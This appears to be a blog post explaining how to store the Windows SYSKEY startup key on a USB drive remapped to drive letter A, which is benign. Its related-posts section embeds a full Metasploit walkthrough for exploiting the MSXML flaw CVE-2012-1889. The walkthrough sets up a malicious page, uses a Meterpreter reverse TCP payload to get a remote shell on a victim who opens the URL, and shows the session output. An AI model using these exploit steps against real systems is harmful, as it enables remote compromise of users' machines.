First, what is “syskey”?
SYSKEY is a utility that encrypts the hashed
password information in a SAM database in a Windows system using a
128-bit encryption key.
SYSKEY was an optional feature added in Windows NT 4.0 SP3. It was
meant to protect against offline password cracking attacks so that the
SAM database would still be secure even if someone had a copy of it.
However, in December 1999, a security team from Bind View found a
security hole in SYSKEY which indicates that a certain form
of cryptanalytic attack is possible offline. A brute force attack then
appeared to be possible.
Microsoft later collaborated with Bind View to issue a fix for the
problem (dubbed the ‘Syskey Bug’) which appears to have been settled and
SYSKEY has been pronounced secure enough to resist brute force attack.
According to Todd Sabin of the Bind View team RAZOR, the pre-RC3 versions of Windows 2000 were also affected.
So this is pretty cool, right? Well, I really like the idea of
keeping this on Floppy so that it requires a floppy disk (a sort of 2
factor (hardware/software) authentication?).
Naturally I wanted to go a bit further and use this on a USB drive
instead of storing to a Floppy. I can’t see myself carrying a floppy
and a USB floppy drive around with me. After all, this provides another
layer of security.
NOTE: I haven’t tested copying data from 1 USB to another USB to see
if it works as a backup. This way you could lock up a USB drive as a
spare if needed.
Here’s how to get this to work using a USB drive.
1. Insert your USB drive into your system and wait for it to be recognized and install any necessary drivers.
2. Fire up disk management and re-assign the drive letter it was given to “A”.
Start up disk management by clicking Start and typing diskmgmt.msc
Right-click the USB drive and choose to assign driver letter or path.
Assign it to letter “A”
Accept the warning message
Now your USB drive is “A”
3. Run Syskey and save encryption to USB Drive “A”
Click Start and type syskey followed by hitting Enter
Syskey launched; Click “Update”
Choose “Store Startup key on floppy disk” and click “OK”
You’ll be prompted to enter your diskette. Make sure your USB drive is inserted and writable.
4. Reboot and have fun. Don’t lose your USB disk! Also, to revert
this, you can run syskey again and choose to store it locally instead of
“on a floppy disk”.
Related Posts
192.168.56.12:1565) Type "sessions" to list the active sessions . Type "sessions -i 1", this will open the connection to the session with the id '1' and bring you to Meterpreter. Type "sysinfo" in the meterpreter to get the system information." href="https://elit-hackers.blogspot.com/2012/07/cve-2012-1889-microsoft-xml-core_30.html">CVE-2012-1889: Microsoft XML Core Services Vulnerability A vulnerability in Microsoft XML Core Services 3.0, 4.0, 5.0, and 6.0 allows remote code execution if a user views a specially crafted webpage using Internet Explorer. An attacker would have no way to force users to visit such a website. Instead, an attacker would have to convince users to visit the website, typically by getting them to click a link in an email message or Instant Messenger message that takes them to the attacker's website. The vulnerability affects all supported releases of Microsoft Windows, and all supported editions of Microsoft Office 2003 and Microsoft Office 2007. Here you can the full list. The vulnerability exists when MSXML attempts to access an object in memory that has not been initialized, which may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the logged-on user. I am going to demonstrate how to use Metasploit tool for testing whether your network vulnerable or not. Open the Terminal and type "msfupdate" to get the latest metasploit modules. Once update is finished, then type "msfconsole". Then type the following command in the console "use exploit/windows/browser/msxml_get_definition_code_exec". Now we have to know the list of settings available for this exploit module. In order to get the list , you can type "show options" in the console. Command: set SRVHOST 192.168.56.10 Details: Here the 192.168.56.11 is the ip of Backtrack . You can get this ip by simply typing the "ifconfig" in the terminal. Command: set lhost 192.168.56.10 Command: set URIPATH / Details: The path in which our exploit will run. As usual, we can use Reverse Tcp payload for this attack also. So type the following command in the Metasploit console: set payload windows/meterpreter/reverse_tcp Type "exploit" in the console. Once the victim loads the URL in his IE browser, you will get the following message in your metasploit console: [*] msxml_get_definition_code_exec - Using msvcrt ROP [*] msxml_get_definition_code_exec - 10.0.1.79:1564 - Sending html [*] Sending stage (752128 bytes) to 192.168.56.12 [*] Meterpreter session 1 opened (192.168.56.10:4444 -> 192.168.56.12:1565) Type "sessions" to list the active sessions . Type "sessions -i 1", this will open the connection to the session with the id '1' and bring you to Meterpreter. Type "sysinfo" in the meterpreter to get the system information. 
1 comments:
thank you....
Please try to comment if i have done well or if you have finished learning from the blog
EmoticonEmoticon